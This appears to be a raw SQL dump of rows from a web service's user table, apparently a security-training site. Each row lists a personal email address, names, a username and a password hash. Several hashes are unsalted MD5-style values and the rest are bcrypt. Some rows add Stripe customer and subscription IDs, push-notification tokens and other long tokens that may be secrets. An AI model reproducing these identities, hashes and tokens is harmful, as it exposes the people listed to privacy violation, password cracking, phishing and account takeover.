(79, NULL, 'Adil ', 'adil4214@gmail.com', '$2a$10$8d.KoQDktrQDacviDpOZOubBBIgLPFDpyx1M53n0vbx6LvV8gGvt6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-16 01:38:57', 'Ottawa', 'Unal', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-15 22:38:57', NULL, 1, 0, NULL, NULL, 'dd1ab811ae7c91c599abe5151d9988b54a52ed7992fac339aa8c7dd1b840e983', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(83, NULL, 'Bb', 'konyali.82@hotmail.com', '$2a$10$UJFJnaYJ25Xkew13NKerH.XLf.hy4c.tvTRlZCCJAPyGMwZjfX5va', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-16 03:10:32', 'Adam', 'Add', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-16 00:10:32', NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'ExponentPushToken[lQZglJO-2l57Zeb2Pu8p_w]', NULL, 0, NULL, 'web', 0, 1, 0),
(84, NULL, 'Burak', 'burakobaris@gmail.com', '$2a$10$vIhpTtdS4dMUMrV7F4EKvOcqZpYBsujSSyp87FAh6Pxx/IpCSFMvC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-16 03:13:19', 'Baris', 'Baris', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-16 00:13:19', NULL, 1, 0, NULL, NULL, 'b46acd1b00750302be21f022178d028ccce407b27609a028204820bd6db7b35b', NULL, NULL, 'ExponentPushToken[LjCJNaBL5W_IZFAHHU5ban]', NULL, 0, NULL, 'web', 0, 1, 0),
(85, NULL, 'Mustafa', 'mustafa_karabulut@windowslive.com', '$2a$10$wG6c3qX7KWoF4JhieAfvNO7nrD36KMpyFl.8wgVCv1rWfg7kuZe0.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-01-16 16:32:57', 'Mk', 'Karabulut', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-16 13:32:57', NULL, 1, 0, NULL, 'd5b905a56737ef9939eaaa200dafbdb22428b969d9338836d01715ad72a5407b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(86, NULL, 'Adnan', 'Oztasadnan@gmail.com', '$2a$10$UX9lVmeAxB6tT2A7VnLyNOCPUk6z8MA0Q/MZLd2CyfCjk2DWpc1hC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-16 21:33:57', 'Oztasadnan', 'Oztas', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-16 18:33:57', NULL, 1, 0, NULL, NULL, 'd0aad71dcf1da37e731c2b8ecf736d083a0a971e51ead472488bb97641a7b9fd', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(88, NULL, 'Sam', 'samilbalci.us@gmail.com', '$2a$10$A6hlXbMb1YozJElDtcnNwuVSEe2UZ7EJ0/zLRqOR0GpDyap5n0OdS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-18 18:25:44', 'samb234_@', 'B', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-18 15:25:44', NULL, 1, 0, NULL, NULL, 'd92c818d777408f198ef73d81ee920a881ccd78dd83c03b16a3fb9f82e88df78', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(89, NULL, 'Ebuumeyr', 'ebuumeyry@gmail.com', '$2a$10$adsOrJPLGyy1C8UQmfLZtOey3AWnGpkYCqpneSYcNRg9ZUm5P3nUG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-20 03:24:46', 'Ebuumeyr21', 'Yazgan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-20 00:24:46', NULL, 1, 0, NULL, NULL, '9538ff5b769770bab9d844a71a976b8ada880cd3cb6a327567ead4edd2c58456', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(91, NULL, 'Shaima', 'smartestone.inshallah321@gmail.com', '$2a$10$5sTKlpUWwr7U9uiNsZMpA.oEG8ZXsp.P/TmsZ9eac8eNmXtTmxkSS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-20 13:34:28', 'shaimaHamood_91', 'Hammod', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-20 10:34:28', NULL, 1, 0, NULL, 'af7a03d85d59c594feb97f9daf6b55fc4ed55489889631f1af4009ec2b0451c4', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(93, NULL, 'Albin', 'aa58363@ubt-uni.net', '$2a$10$jO2eA2OBXcl9lpHJJjeCbewdwB.pGc9gqZmIHvaX3frddPD8NGl06', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-01-20 23:53:45', 'albini52', 'Ajdari', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-20 20:53:45', NULL, 1, 0, NULL, '220e3e681f7b405414c9f974fb867fc8a8529078238990dd8e1a5ca19a9b141e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(94, NULL, 'Ahmed', 'ahmad.abdulqader.90@gmail.com', '$2a$10$QebLGsnGLsrwSGT2twMhT.NhdUG4lHVt5C8jonF/SyOLQpmCn4Vy6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-21 04:56:47', 'TheWildHunter', 'AbdElKader', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-21 01:56:47', NULL, 1, 0, NULL, 'b5f0c8ed7b7083e1c3d5ccfd02a287e988e1c3c787a57b9359d1942a7bec11da', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(95, NULL, 'paloma', 'palomaoliveira@msn.cn', '$2a$10$gqJ8J1YOFQIiE9/nMIftXeBV.CkpYn48/7rPSaCv0uimNlkz2R4rm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-14 17:55:55', 'paah', 'rodrigues', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-21 17:16:54', NULL, 1, 0, NULL, 'd7ff0ce8a13bb0970c8798cf5e731a809e86e51e67e5e8d58f7ac2078c14f29f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(96, NULL, 'John', 'johnjcutter@gmail.com', '$2a$10$jArp7an5bVdW90wwZgrNo./TL48FvUJj7cYwIlNlldMU4kUF8sSri', 'normal', NULL, 'free', 'active', 'sub_1SsHYfL5VKtXn66bIRWQMAE9', 'cus_TpxTvHr1TUNHre', 0, NULL, NULL, NULL, NULL, 2, '2026-01-22 07:10:46', 'cuttingedge9', 'Cutter', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-22 04:10:46', NULL, 1, 0, NULL, '6677eee4907bebee0a10055b296051823237ccd893228a38d64da5f627b915a5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(97, NULL, 'Daniel', 'daweda@my.wgu.edu', '$2a$10$w3ajn.8yvbGL8SJJH7XQfOB7WOyvXIQP8IRP3MpPgEzo1bfZQTUaS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-25 08:03:58', 'Dann5434', 'Aweda', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 05:03:58', NULL, 1, 0, NULL, 'ab8f3e6377f44010e917215b6a25e80e245e56064d777e2ca4f1c5484ec018f7', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(98, NULL, 'Aman', 'ask001aman@gmail.com', '$2a$10$/Y30JSEv.QirbZ.TVBgitek.R705DAgCWBl0PP9xkRPhh63xx/kGq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-25 11:17:42', 'Ask001aman', 'Singh', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 08:17:42', NULL, 1, 0, NULL, '73d16cb7daeaea52003c248686fd653490afdc6763c741ff5c106a096ff66a44', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(99, NULL, 'Alina', 'alinaraza104@gmail.com', '$2a$10$ecNRnyHOKcsgAfM9OsE4tu0.H2ua3WhVSvV1VG7SP9ykMnyF6uUb2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-15 08:10:28', 'Alina', 'Raza ', 1, NULL, NULL, NULL, 1, NULL, NULL, '2026-01-25 15:12:11', NULL, 1, 0, NULL, '53188ac67dbb67a5f4e39f949187cd4c107d47933413d0f7eb1be5dcf50e9f99', NULL, 'CLOUD', NULL, 'ExponentPushToken[Qpo8uFPhGg88rhUlgzbf0D]', NULL, 0, NULL, 'web', 0, 1, 0),
(100, NULL, 'Bertram', 'bertram_e@ymail.com', '$2a$10$B.dcj2H0SIAhBCWc1zOvLexX1j/uF1damgTnufYF0iRjfNwwyZ8vK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-25 22:36:46', 'bertram_eymailcom', 'Ekwunife', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 19:36:46', NULL, 1, 0, NULL, '8d689fe907b1f0cccda0753bf3828e7bcda2d56c6ef7b04bf132f531c49a2edf', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(101, NULL, 'Connor', 'rcbyron3@gmail.com', '$2a$10$tA.hs91oS4ilTZh08LcG8.BUOAHBUBh.zrZWxsyBq1YLFediCreVe', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 00:03:19', 'conzor', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 21:03:19', NULL, 1, 0, NULL, '65fd0a44d00ef90b3a3847113b9082fe617b76cfcc9f6f2475ceb441af980ab1', '1d10c4d0cee8cb1baaf5bf7978071b4d4a90147b3543bdee0aa97659e6ce346b', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(102, NULL, 'Halil', 'hbariscyber@gmail.com', '4ca815513b36f1ecc7eb335cceb0d9d3', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 00:54:58', 'hbariscyber6cd01c', 'BARIS', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 21:54:58', NULL, 1, 0, NULL, '3378f8a50f17cbb85616565068c1b4cd42ffaf9a6a9f83677ce5ddaded0ce392', 'a3bc9d79c4c58f10877d7ba19d05715210b3a56a74b5271f52a9c904c45d3522', NULL, NULL, 'ExponentPushToken[mpBXfZHQhy10xWYYrTA2Xq]', NULL, 0, NULL, 'web', 0, 1, 0),
(103, NULL, 'Rodney', 'rp.interactive@gmail.com', '$2a$10$haR0KAgbIYS9grwVNUe7/.cqTRwtKP6KaUbBYTFpx4OP6KRRnabfy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 04:31:17', 'rodneysprod', 'Painagan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-26 01:31:17', NULL, 1, 0, NULL, 'aa27639814b8a7d7994c8a720fbd1b10f59c257817867c874a5d8fc9fde6c534', '22d566647086330a2e4c68ca26d3df124e0fce6f886d92312ccc0e7a9d1f3f94', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(105, NULL, 'Ron', 'Hadi.s.khalaf@gmail.com', '$2a$10$UoeX3kkl5ORexFtJ4H0R5.BBVsSpt5Hwnya12LxPVMaY74KOYjJQ6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 06:43:19', ' Ron', 'Seo', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-26 03:43:19', NULL, 1, 0, NULL, '50806a12f18bf4795733cef76907bdb85afdb4482aa3a252bc33fb8f23209bec', 'a9f675babe524660c08a4c32c4d2db3f6a13c1fb576e293ab545a3aad8fead8a', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(106, NULL, 'David', 'storm09b3@quickmail.byetabs.com', '$2a$10$gNWfgM0HE5Tmh92kyifUUuJCuXt7fiI5Kz/qKeJOFIgLKZmeNgHia', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 07:14:59', 'David', 'S', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-26 04:14:59', NULL, 1, 0, NULL, 'ff122befc45b3c2b25b50cc916d711ba519e2764f408c02626e0db911e8fac6c', '69f8cb799f82b732a1bba5c9fe13790947cd071d11695233f14c2e583e144de9', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(107, NULL, 'Fadime', 'fadime.taskinsoy@georgebrown.ca', '$2a$10$IFnQgf7T.QN1EYtRR79Fv.Dg6U1cMpyi8uunckGr81W2Xc8Qdahf2', 'pro', NULL, 'monthly', 'active', 'sub_1SvK77L5VKtXn66bCJFUV9jb', 'cus_Tt6JLy763tjkqR', 0, NULL, NULL, NULL, NULL, 2, '2026-01-27 22:39:37', 'Cyberca', 'Taskinsoy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-27 19:39:37', '2026-03-02 18:58:32', 1, 0, NULL, 'a917307a923059e2fdd44dff8fcac0e5bfafe1fd82b9aa266c405765dcaaf1de', NULL, 'SIEM', NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(108, NULL, 'Abdul Wakil', 'zamani.abdwakil@gmail.com', '1e9e410504cd5aa00bcb14e96f66b5cc', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-27 22:55:48', 'zamani.abdwakilb2de17', 'Zamani', 1, NULL, NULL, NULL, 1, NULL, NULL, '2026-01-27 19:55:48', NULL, 1, 0, NULL, 'ae8339e20e3c731b0f8935c4c1d04f3a4d88d56da0a94bcc16b19d87588403f1', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(109, NULL, 'Kabiru ', 'adkasu26@gmail.com', '$2a$10$xQTWllcAApZCZthwX/0ZY.Ilf0gTakhnwpMX24ZLOFwR42hi1AvgW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-26 17:03:46', 'Kayfactorial', 'Adio ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-27 21:06:52', NULL, 1, 0, NULL, 'fe5ec6c4630d882755df3b82093d95ef1e5c3f9f30a885a68c587e2d7391564b', '0ace485598be9f1d37c10648389209f25f890884aba8e5b4f37455ec940a51f6', 'NDR', 'MAL', 'ExponentPushToken[ZGIa83EpyEFKmKL0eBLNrL]', NULL, 0, NULL, 'web', 0, 1, 0),
(110, NULL, 'Michael', 'michealscrook@gmail.com', 'cbb3836a42fe43928c5f82f9bf8875f2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 16:36:09', 'michealscrooka63ea9', 'Crooks', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 13:36:09', NULL, 1, 0, NULL, 'f2e70050803fe6d9b3ea0e0319217831350808ca613f1928cff1d4cbd76f448e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(111, NULL, 'Kleo', 'kleokarpathy@gmail.com', '856d998a9d15e3edead2905797b12f18', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:52:08', 'kleokarpathydf9dc3', 'Karpathy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:52:08', NULL, 1, 0, NULL, 'bf10001f51f26d6d76481ea591ea5dd17cb4e34b7f0ae44aafcffb84fbbcc52f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(112, NULL, 'Susan', 'susanharts99@gmail.com', '76c6a936e69641418f79281a37bf6b86', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:53:28', 'susanharts998fdfce', 'Harts', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:53:28', NULL, 1, 0, NULL, 'a531c2ebf5348d193b26ee64b462633d5237d9f31c7ff9158c185aff628d0246', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(113, NULL, 'Logan', 'logantaylor1656@gmail.com', '5d84c69e2ea772b1eb371855a7026710', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:55:24', 'logantaylor16567f6997', 'Taylor', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:55:24', NULL, 1, 0, NULL, '25392f11f61041dac1b518df13579db7728975dbd7bd1ca381e90b6d140f680a', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(114, NULL, 'Benjamin', 'halesbenjamin61@gmail.com', 'c16f10935fcac9e886d78a9ec873dd5e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:57:22', 'halesbenjamin61f22b2a', 'Hales', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:57:22', NULL, 1, 0, NULL, '12553e2d73deef5705958afcbc365b0f4fa481d48b37ee6440b6c7171266de6f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(115, NULL, 'A.', 'ldrarivunithi@gmail.com', '3280b0a37626d080b336813aa2d6f2f8', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-31 15:37:56', 'ldrarivunithi0a7c25', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-31 12:37:56', NULL, 1, 0, NULL, '47ca6b0c2cbb5ba4d26da923e250a086d54829a029eb8a69a44214676ec8de5f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(116, NULL, 'shane', 'shanerees2k5@hotmail.com', '$2a$10$lcc3zJWwm9a1KCnWhmOuH.NGZmd1sJGrwBgYolAza6RofE.v0k7.K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-01 12:06:03', 'SMR', 'rees', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 09:06:03', NULL, 1, 0, NULL, '8651701015ba038a40901180e02481a70b64a9c70af9057ad6b582dd4212240b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(117, NULL, 'Lucas', 'jasperlucas024@gmail.com', '3544af3c112dfbf9723481b91c854fa5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:19:53', 'jasperlucas0241f0daa', 'Jasper', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:19:53', NULL, 1, 0, NULL, 'aaaf4875c9f801b833d431160a5662179995fc7b6fb586b4d9c159c597bd1875', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(118, NULL, 'Nancy', 'nancystark100@gmail.com', 'dda32e43120191e5dc7a63c2fcf48ee7', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:22:02', 'nancystark1001e2130', 'Stark', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:22:02', NULL, 1, 0, NULL, '274d088b14ccc21e243b6345709462de8efd81457938204d86a0392cd4021e9a', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(119, NULL, 'Steve', 'stevenharrys44@gmail.com', '0af1c841986e3c324b86e16bbc9a4d6a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:28:47', 'stevenharrys44256e91', 'Harrington', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:28:47', NULL, 1, 0, NULL, '80146a52b0f2de905d873820985a97bb023db578375ffe555f63829b0246376e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(120, NULL, 'Mont', 'montgregamore@gmail.com', '10466ee48dcc6f0c3bf0bd14271018c8', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:29:24', 'montgregamore9e2d45', 'Gregamore', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:29:24', NULL, 1, 0, NULL, 'e3dc63b80c328e382319b7d050113d9ba1b9c6208ba3ee9249616b5c52678add', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(122, NULL, 'Bertram', 'bertram.c.ekwunife@gmail.com', 'e4faa8419aa920b32494f27827219a26', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 22:53:59', 'bertram.c.ekwunife12136a', 'Ekwunife', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 19:53:59', NULL, 1, 0, NULL, '9094fc5e6f8c768c7739eb3f5bfa3db8d08cdb3c3592284bc4aba12742bc13d9', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(123, NULL, 'Ilxom', 'togjab@imail.edu.vn', '$2a$10$cRM8geA8qBydvcRk6KJRGOQOdl8lCnQCoiGFSVtVDjTWXgJqdgtx.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-02 13:05:56', 'blkmg', 'Sharapov', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-02 10:05:56', NULL, 1, 0, NULL, '9a263d9ebc6236b15b7f826122f41188f4fe7bd170c73114693ca00448afe777', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(124, NULL, 'Ilxom', 'ilxomsteam@gmail.com', 'f52613b42ef50d3a4226be93e530e8cf', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-02 13:09:50', 'ilxomsteamed7021', 'Sharapov', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-02 10:09:50', NULL, 1, 0, NULL, '3dddbc3e226b70d4e255486ebc98de22cb66b12aa3b41eea30864b680da5168e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(125, NULL, 'Ludwig', 'ludwigborgen@gmail.com', '04d2c125ba5fd5e0d19118305824b42d', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-04 04:33:45', 'ludwigborgen6f6f96', 'Borgen', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-04 01:33:45', NULL, 1, 0, NULL, 'dbec187c279da7f3c16a58d6df0f225d5d4ae4fc81f856defd337d8b8e7b5c29', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(126, NULL, 'Hasan', 'hasancomcee@gmail.com', '$2a$10$Q3YS6gJ4eNPHZmyrphdUVO8SoeaCj9HFv/10AkWPUNiHhNuuNoKES', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-05 01:06:04', 'hasancomce', 'Comce', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-04 22:06:04', NULL, 1, 0, NULL, '78fde2d3c7abd1143264d20d437341d4356d76fbbd38950482e16d479c17f18c', NULL, 'CLOUD', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(127, NULL, 'Mario', 'mariouriel10@gmail.com', '23f2905f2ed044006abdf8468bb51fc2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-05 20:48:43', 'mariouriel104eb6b1', 'Uriel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-05 17:48:43', NULL, 1, 0, NULL, '4f2f6196317096dc9e25b797947a646a71183af860a303d5b5e459f03cee3019', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(128, NULL, 'Hesham', 'heshammamdouh199717@gmail.com', 'bfa40df0bd0841c74e3017e84baf6315', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-07 04:17:18', 'heshammamdouh199717af6c33', 'Mamdouh', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-07 01:17:18', NULL, 1, 0, NULL, '2136ebff1a7ecbb04153abaca4884293c11d22fadc3739fd4f78499fb5162a4d', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(129, NULL, 'You', '443103855@student.ksu.edu.sa', '$2a$10$UUXl3lpzk4QQpVh2vhs1q.EVzAEAGBcuQz9m.UR8a96L28Dp5MoDu', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-08 00:48:41', 'Yousef7', 'A', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-07 21:48:41', NULL, 1, 0, NULL, '2f2fb36fcb4fd47a7c5c5c6c4bc360144f689d945346e8b47e883620d7132375', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(131, NULL, 'ca', 'yqxea2qjvd@cross.edu.pl', '$2a$10$3VAoob/YLnD/VCKFZD1pZeygVFEToIFvqC4/FPFnxczIlZsY9qkym', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-08 11:15:26', 'yqxea2qjvd', 'dac', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-08 08:15:26', NULL, 1, 0, NULL, '1b1a8fafea61e77686e67eb0712d693d2615bb28898b504eaa24f9546667437b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(133, NULL, 'Ryan', 'ryanhuck124@gmail.com', 'cf8e88c1f50ca3cfcee46d23414eb14e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-08 19:07:41', 'ryanhuck1242d35d5', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-08 16:07:41', NULL, 1, 0, NULL, '6570f07392522b8657d43f9a49d6f3589a6acc9567c84712ccaac7fc246139e3', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(135, NULL, 'QWERTy', 'learnhacks360@gmail.com', '$2a$10$PwRT2Fr3HA8DAjXUvWvyx.d7z6.qGDSHR48znaM68YluB3mX9wH8i', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-08 20:41:33', 'learnhacks360', 'SDF', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-08 17:41:33', NULL, 1, 0, NULL, 'b254e5653db566cd9ebabdd8b6af8063dc1b069fdc37017e748327af2672d2c6', NULL, 'SIEM', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(136, NULL, 'Adam', 'lionadamus@gmail.com', 'c3da9ac18f37d776b80849079461f88c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-10 01:07:24', 'lionadamus5e5d4f', 'Lion', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-09 22:07:24', NULL, 1, 0, NULL, 'ce1d14828342269e4d37b48c1266cc12a35cc9a83e4956493474b8319c08c991', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(137, NULL, 'Ravi', 'ravipatel43194@gmail.com', 'f6695e9d1c7097e7bf338a97ebbd48e5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-10 15:44:43', 'ravipatel43194c956de', 'Patel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-10 12:44:43', NULL, 1, 0, NULL, '6647a2b971576182f389ac80cd21c412db188085840c7a9ce3eb9e33f3980a0b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(138, NULL, 'abaalsafa', 'ffxxqq1@gmail.com', '$2a$10$zHMpoFxvBokoY5UcROCxI.09JFFRplIiwNT/Yin4h/ltx/2aH.huO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-11 19:58:57', 'w6n', 'faisal', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-11 16:58:57', NULL, 1, 0, NULL, '42d88aacfe5a4cb2178e059492fae0166a3da950e179dbd863e182b6e39bde91', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
